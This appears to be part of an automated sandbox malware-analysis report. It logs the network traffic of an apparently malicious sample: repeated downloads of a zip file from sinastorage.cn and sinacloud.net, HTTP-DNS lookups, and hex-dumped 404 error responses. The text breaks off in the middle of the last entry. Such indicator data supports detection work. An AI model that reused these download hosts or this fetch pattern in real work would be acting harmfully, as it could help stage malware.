      Source: global trafficHTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.cn HTTP/1.1User-Agent: A2F0jleksHost: 114.114.114.114
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.cn HTTP/1.1User-Agent: A2F0jleksHost: 119.29.29.29
      Source: global trafficHTTP traffic detected: GET /d?dn=sinastorage.cn HTTP/1.1User-Agent: A2F0jleksHost: 182.254.116.116
      Source: global trafficHTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /d?dn=sinacloud.net HTTP/1.1User-Agent: A2F0jleksHost: 114.114.114.114
      Source: global trafficHTTP traffic detected: GET /d?dn=sinacloud.net HTTP/1.1User-Agent: A2F0jleksHost: 182.254.116.116
      Source: global trafficHTTP traffic detected: GET /d?dn=sinacloud.net HTTP/1.1User-Agent: A2F0jleksHost: 119.29.29.29
      Source: global trafficHTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: www.8pkw.com
      Source: global trafficDNS traffic detected: DNS query: www.sina.com.cn
      Source: global trafficDNS traffic detected: DNS query: www.sogou.com
      Source: global trafficDNS traffic detected: DNS query: www.so.com
      Source: global trafficDNS traffic detected: DNS query: www.baidu.com
      Source: global trafficDNS traffic detected: DNS query: www.iqiyi.com
      Source: global trafficDNS traffic detected: DNS query: sinacloud.net
      Source: global trafficDNS traffic detected: DNS query: shoufeifz.qijianfz.com
      Source: global trafficDNS traffic detected: DNS query: sinastorage.com
      Source: global trafficDNS traffic detected: DNS query: sinastorage.cn
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:25:07 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 35eea2be-2412-0521-2515-6c92bfce6724x-error-code: NoSuchBucketData Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 64 61 74 61 2e 74 78 74 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 35 65 65 61 32 62 65 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 31 35 2d 36 63 39 32 62 66 63 65 36 37 32 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>35eea2be-2412-0521-2515-6c92bfce6724</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:25:15 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 35287258-2412-0521-2517-6c92bfce66d4x-error-code: NoSuchBucketData Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 64 61 74 61 2e 74 78 74 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 35 32 38 37 32 35 38 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 31 37 2d 36 63 39 32 62 66 63 65 36 36 64 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>35287258-2412-0521-2517-6c92bfce66d4</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:25:10 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 32b98376-2412-0521-2518-b4055d752c87x-error-code: NoSuchBucketData Raw: 65 32 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 32 30 32 34 2d 31 32 2d 30 35 2f 32 31 5f 32 32 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 62 39 38 33 37 36 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 31 38 2d 62 34 30 35 35 64 37 35 32 63 38 37 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: e2<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>32b98376-2412-0521-2518-b4055d752c87</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:25:18 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 767f865b-2412-0521-2520-b0087553a6a0x-error-code: NoSuchBucketData Raw: 65 32 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 32 30 32 34 2d 31 32 2d 30 35 2f 32 31 5f 32 32 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 37 66 38 36 35 62 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 32 30 2d 62 30 30 38 37 35 35 33 61 36 61 30 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: e2<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>767f865b-2412-0521-2520-b0087553a6a0</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:25:12 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 32a92b43-2412-0521-2521-b4055d752a1dx-error-code: NoSuchBucketData Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 64 61 74 61 2e 74 78 74 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 61 39 32 62 34 33 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 32 31 2d 62 34 30 35 35 64 37 35 32 61 31 64 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>32a92b43-2412-0521-2521-b4055d752a1d</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:25:14 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 766b7ab3-2412-0521-2522-5ca7213e028cx-error-code: NoSuchBucketData Raw: 65 32 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 32 30 32 34 2d 31 32 2d 30 35 2f 32 31 5f 32 32 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 36 62 37 61 62 33 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 32 32 2d 35 63 61 37 32 31 33 65 30 32 38 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: e2<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>766b7ab3-2412-0521-2522-5ca7213e028c</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:25:20 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 76c91b69-2412-0521-2523-5ca7213e04ccx-error-code: NoSuchBucketData Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 64 61 74 61 2e 74 78 74 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 63 39 31 62 36 39 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 32 33 2d 35 63 61 37 32 31 33 65 30 34 63 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>76c91b69-2412-0521-2523-5ca7213e04cc</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 13:25:22 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 32f42f93-2412-0521-2524-b4055d752c57x-error-code: NoSuchBucketData Raw: 65 32 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 32 30 32 34 2d 31 32 2d 30 35 2f 32 31 5f 32 32 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 66 34 32 66 39 33 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 32 34 2d 62 34 30 35 35 64 37 35 32 63 35 37 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: e2<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>32f42f93-2412-0521-2524-b4055d752c57</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22080916-2b967e2Date: Thu, 05 Dec 2024 13:25:29 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: c029e56c-2412-0521-2529-0894eff93358x-error-code: NoSuchBucketData Raw: 65 32 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 32 30 32 34 2d 31 32 2d 30 35 2f 32 31 5f 32 32 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 63 30 32 39 65 35 36 63 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 32 39 2d 30 38 39 34 65 66 66 39 33 33 35 38 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: e2<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>c029e56c-2412-0521-2529-0894eff93358</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:25:30 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 34f07294-2412-0521-2530-6c92bfce66dex-error-code: NoSuchBucketData Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 64 61 74 61 2e 74 78 74 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 34 66 30 37 32 39 34 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 33 30 2d 36 63 39 32 62 66 63 65 36 36 64 65 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>34f07294-2412-0521-2530-6c92bfce66de</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:25:33 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 765b09e8-2412-0521-2533-5ca7213e0802x-error-code: NoSuchBucketData Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 64 61 74 61 2e 74 78 74 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 35 62 30 39 65 38 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 33 33 2d 35 63 61 37 32 31 33 65 30 38 30 32 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>765b09e8-2412-0521-2533-5ca7213e0802</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:25:33 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 7465048a-2412-0521-2533-047bcb4b6b04x-error-code: NoSuchBucketData Raw: 65 32 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 32 30 32 34 2d 31 32 2d 30 35 2f 32 31 5f 32 32 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 34 36 35 30 34 38 61 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 33 33 2d 30 34 37 62 63 62 34 62 36 62 30 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: e2<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>7465048a-2412-0521-2533-047bcb4b6b04</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:25:44 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 746f197e-2412-0521-2544-047bcb4b7614x-error-code: NoSuchBucketData Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 64 61 74 61 2e 74 78 74 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 34 36 66 31 39 37 65 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 34 34 2d 30 34 37 62 63 62 34 62 37 36 31 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>746f197e-2412-0521-2544-047bcb4b7614</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:25:44 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 7465e5e1-2412-0521-2544-047bcb4b7810x-error-code: NoSuchBucketData Raw: 65 32 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 32 30 32 34 2d 31 32 2d 30 35 2f 32 31 5f 32 32 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 34 36 35 65 35 65 31 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 34 34 2d 30 34 37 62 63 62 34 62 37 38 31 30 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: e2<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/2024-12-05/21_22</Resource> <RequestId>7465e5e1-2412-0521-2544-047bcb4b7810</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:25:47 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 34f09294-2412-0521-2547-6c92bfce66dex-error-code: NoSuchBucketData Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 64 61 74 61 2e 74 78 74 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 34 66 30 39 32 39 34 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 34 37 2d 36 63 39 32 62 66 63 65 36 36 64 65 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/data.txt</Resource> <RequestId>34f09294-2412-0521-2547-6c92bfce66de</RequestId></Error>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.0 r22061420-1acaf9bDate: Thu, 05 Dec 2024 13:25:47 GMTContent-Type: application/xmlTransfer-Encoding: chunkedConnection: keep-aliveX-Requester: GRPS000000ANONYMOUSEX-RequestId: 345c5bc1-2412-0521-2547-0894eff93894x-error-code: NoSuchBucketData Raw: 65 32 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 32 30 32 34 2d 31 32 2d 30 35 2f 32 31 5f 32 32 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 34 35 63 35 62 63 31 2d 32 34 31 32 2d 30 35 32 31 2d 32 35 34 37 2d 30 38 39 34 65 66 66 39 33 38 39 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: e2<?xml 